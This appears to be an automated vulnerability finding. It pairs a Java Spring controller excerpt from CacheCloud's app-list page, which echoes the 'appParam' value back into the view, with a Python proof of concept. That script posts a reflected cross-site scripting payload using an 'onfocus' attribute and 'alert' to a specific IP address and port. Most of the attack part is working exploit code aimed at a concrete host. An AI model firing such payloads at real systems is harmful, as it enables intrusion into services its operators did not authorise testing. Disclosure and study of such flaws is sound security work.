// src/main/java/com/sohu/cache/web/controller/TotalManageController.java#L55-L95 55: @RequestMapping({"/list"}) 56: public ModelAndView doTotalList(HttpServletRequest request, HttpServletResponse response, String appParam, Model model, AppSearch appSearch) { 57: AppUser currentUser = this.getUserInfo(request); 58: List<SystemResource> redisVersionList = this.resourceService.getResourceList(ResourceEnum.REDIS.getValue()); 59: if (!StringUtils.isEmpty(appParam)) { 60: if (StringUtils.isNumeric(appParam)) { 61: appSearch.setAppId(Long.parseLong(appParam)); 62: } else { 63: appSearch.setAppName(appParam); 64: } 65: } 66: 67: int totalCount = this.appService.getAppDescCount(currentUser, appSearch); 68: int pageNo = NumberUtils.toInt(request.getParameter("pageNo"), 1); 69: int pageSize = NumberUtils.toInt(request.getParameter("pageSize"), 20); 70: Page page = new Page(pageNo, pageSize, totalCount); 71: appSearch.setPage(page); 72: List<AppDesc> apps = this.appService.getAppDescList(currentUser, appSearch); 73: List<AppDetailVO> appDetailList = new ArrayList(); 74: if (apps != null && apps.size() > 0) { 75: for(AppDesc appDesc : apps) { 76: AppDetailVO appDetail = this.appStatsCenter.getAppDetail(appDesc.getAppId()); 77: appDetail.getAppDesc().setBackupType(appDesc.getBackupType()); 78: appDetailList.add(appDetail); 79: } 80: } else { 81: page.setTotalCount(0); 82: } 83: 84: model.addAttribute("apps", apps); 85: model.addAttribute("appDetailList", appDetailList); 86: model.addAttribute("list", apps); 87: model.addAttribute("appOperateActive", SuccessEnum.SUCCESS.value()); 88: model.addAttribute("appParam", appParam); 89: model.addAttribute("page", page); 90: model.addAttribute("persistenceType", appSearch.getPersistenceType()); 91: model.addAttribute("backupType", appSearch.getBackupType()); 92: model.addAttribute("redisVersionList", redisVersionList); 93: return new ModelAndView("manage/total/list"); 94: } 95: 

import requests from requests.sessions import Session class CustomSession(Session): def request( self, method, url, params = None, data = None, headers = None, cookies = None, files = None, auth = None, timeout = None, allow_redirects = True, proxies = None, hooks = None, stream = None, verify = None, cert = None, json = None, ): arg_names = ( 'method', 'url', 'params', 'data', 'headers', 'cookies', 'files', 'auth', 'timeout', 'allow_redirects', 'proxies', 'hooks', 'stream', 'verify', 'cert', 'json' ) local_variables = locals() local_variables = {n: local_variables[n] for n in local_variables if n in arg_names} local_variables['headers'] = local_variables.get('headers') or dict() local_variables['headers'].update({'referer': 'http://34.169.199.145:40101/admin/app/list', 'User-Agent': 'oxpecker', 'accept-language': 'en-US', 'x-requested-with': 'XMLHttpRequest', 'origin': 'http://34.169.199.145:40101', 'upgrade-insecure-requests': '1', 'pragma': 'no-cache', 'cache-control': 'no-cache', 'accept-encoding': 'gzip, deflate'}) return super().request(**{n: local_variables[n] for n in local_variables if n in arg_names}) requests.sessions.Session = CustomSession # ================================== Poc Start =================================== import requests url = 'http://34.169.199.145:40101/manage/total/list' malicious_payload = 'X" tabindex="1" autoFoCUs oNFoCUS=alert("zast-xss")//' data = {'appParam': malicious_payload, 'pageNo': '1', 'pageSize': '20', 'userId': '1'} response = requests.post(url, data=data, verify=False, allow_redirects=False) print('Status Code:', response.status_code) print('Response Text:', response.text) # =================================== Poc End ====================================